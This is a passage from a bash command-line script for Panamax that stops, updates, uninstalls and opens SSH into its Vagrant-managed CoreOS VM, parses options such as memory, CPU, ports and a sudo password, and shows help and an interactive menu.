  setEnvVar "PMX_OPERATION" "$operation"
  source "$ENV"
  if ! runVagrant halt; then
    echo >&2 "Stopping Panamax seems to have failed. Please try again using the reinstall option."
    exit 1
  fi
  echo "Panamax stopped."
}
function updatePanamax {
# Update the Panamax components: re-provision the VM (which pulls new
# images) only when the update check reports a newer version.
checkPreReqs
checkPanamaxVmExists
setEnvVar "PMX_OPERATION" "$operation"
setEnvVar "PMX_IMAGE_TAG" "$PMX_IMAGE_TAG"
source "$ENV"
# Sets the updateAvailableForPmx flag consumed below.
checkForPanamaxUpdate
if [[ $updateAvailableForPmx == "1" ]]; then
echo Updating Panamax
# Preserve custom NAT forwards across the reload.
savePortForwardingRules
runVagrant reload --provision || { echo >&2 "Updating Panamax seems to have failed. Please try again using the reinstall option."; exit 1; }
recreatePortForwardingRules
openPanamax;
saveVersionInfo
checkForSetupUpdate
echo Update Complete
else
echo "Panamax is already up to date."
fi
}
function uninstallPanamax {
  # Destroy the Panamax VM and remove the CoreOS base box.
  checkPanamaxVmExists
  setEnvVar "PMX_OPERATION" "$operation"
  echo "Uninstalling Panamax"
  runVagrant destroy -f
  vagrant box remove "$PMX_BASEBOX"
  echo "Uninstall complete."
}
function sshToPanamax {
# Open an interactive SSH session into the Panamax VM via vagrant.
runVagrant ssh
}
function debug {
# Dump the persisted environment settings (minus the "export " prefix)
# for troubleshooting; requires the Panamax VM to exist.
checkPanamaxVmExists
echo "Printing current env settings..."
sed 's/export //g' $ENV
}
function showShortHelp {
  # One-line CLI usage summary, followed by a blank line.
  printf '%s\n\n' "panamax {init|up|pause|restart|info|check|download|reinstall|delete|help} [-ppUi=<panamax UI port>] [-ppApi=<panamax API port>] [--dev|stable] [-Id=y|n] [-sp=<sudo password>] [--memory=1536] [--cpu=2]"
}
function showLongHelp {
# Full help: the short usage line plus one description line per operation.
# The echo_* strings are defined elsewhere in this file.
showShortHelp
echo ""
echo $'\n' $'\n' "$echo_install" $'\n' "$echo_stop" $'\n' "$echo_start" $'\n' "$echo_restart" $'\n' "$echo_reinstall" $'\n' "$echo_info" $'\n' "$echo_checkUpdate" $'\n' "$echo_update" $'\n' "$echo_uninstall" $'\n' "$echo_ssh" $'\n' "$echo_help"
echo ""
}
function readParams {
# Parse the command line: operation keywords (with aliases) set $operation;
# option flags set the corresponding globals consumed by installPanamax.
# Matching is case-insensitive, but option VALUES are taken from the
# original (un-lowercased) argument via ${i#*=}.
for i in "$@"
do
case `echo $i | tr '[:upper:]' '[:lower:]'` in
--dev)
PMX_IMAGE_TAG=dev;;
--stable)
PMX_IMAGE_TAG=stable;;
--memory=*)
panamaxRam="${i#*=}";;
--cpu=*)
panamaxCpus="${i#*=}";;
install|init)
operation=install;;
uninstall|delete)
operation=uninstall;;
stop|pause)
operation=stop;;
start|up)
operation=start;;
restart)
operation=restart;;
update|download)
operation=update;;
check)
operation=check;;
info|--version|-v)
operation=info;;
reinstall)
operation=reinstall;;
ssh)
operation=ssh;;
debug)
operation=debug;;
-op=*|--operation=*)
operation="${i#*=}";;
-vd=*|--vagrantdownload=*)
download="${i#*=}";;
-ld=*|--localdomain=*)
localDomain="${i#*=}";;
-sp=*|--sudopassword=*)
sudoPassword="${i#*=}";;
--help|-h|help)
showLongHelp;
exit 1;;
-sv)
getPanamaxSetupVersion;;
--insecure-registry)
pmxInsecureRegistry="y";;
*)
showLongHelp;
exit 1;;
esac
done
}
function main {
if [[ -f "$ENV_COMMIT" ]]; then
cp "$ENV_COMMIT" "$ENV"
source "$ENV"
else
rm -f "$ENV"
touch "$ENV"
fi
if [[ ! -f "$PMX_VAR" ]]; then
mkdir -p "$PMX_VAR"
fi
if [[ "$1" != "-sv" ]]; then
displayLogo
fi
readParams "$@"
if [[ $# -gt 0 ]]; then
case $operation in
install) installPanamax "$@" || { showHelp; exit 1; } ;;
reinstall) installPanamax "$@" || { showHelp; exit 1; } ;;
restart) restartPanamax;;
stop) stopPanamax;;
start) startPanamax;;
check) checkForUpdate "u";;
info) checkForUpdate "e";;
update) updatePanamax;;
uninstall) uninstallPanamax;;
ssh) sshToPanamax;;
debug) debug;;
*) showLongHelp;;
esac
else
PS3="Please select one of the preceding options: "
select operation in "$echo_install" "$echo_stop" "$echo_start" "$echo_restart" "$echo_reinstall" "$echo_info" "$echo_checkUpdate" "$echo_update" "$echo_uninstall" "$echo_ssh" "$echo_help" "$echo_debug" "quit"; do
case $operation in
"$echo_install") operation="install"; installPanamax; break;;
"$echo_reinstall") operation="reinstall"; installPanamax; break;;
"$echo_restart") operation="restart"; restartPanamax; break;;
"$echo_start") operation="start"; startPanamax; break;;
"$echo_stop") operation="stop"; stopPanamax; break;;
"$echo_checkUpdate") operation="check"; checkForUpdate "u"; break;;
"$echo_info")operation="info"; checkForUpdate "e"; break;;
"$echo_update") operation="update"; updatePanamax; break;;
"$echo_uninstall") operation="uninstall"; uninstallPanamax; break;;
"$echo_help")showLongHelp; break;;
"$echo_ssh") sshToPanamax;;
"$echo_debug") debug; break;;
quit) exit 0;;
esac
done
fi
checkForUpdate
mv "$ENV" "$ENV_COMMIT"
exit 0;
}
main "$@";
| true
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.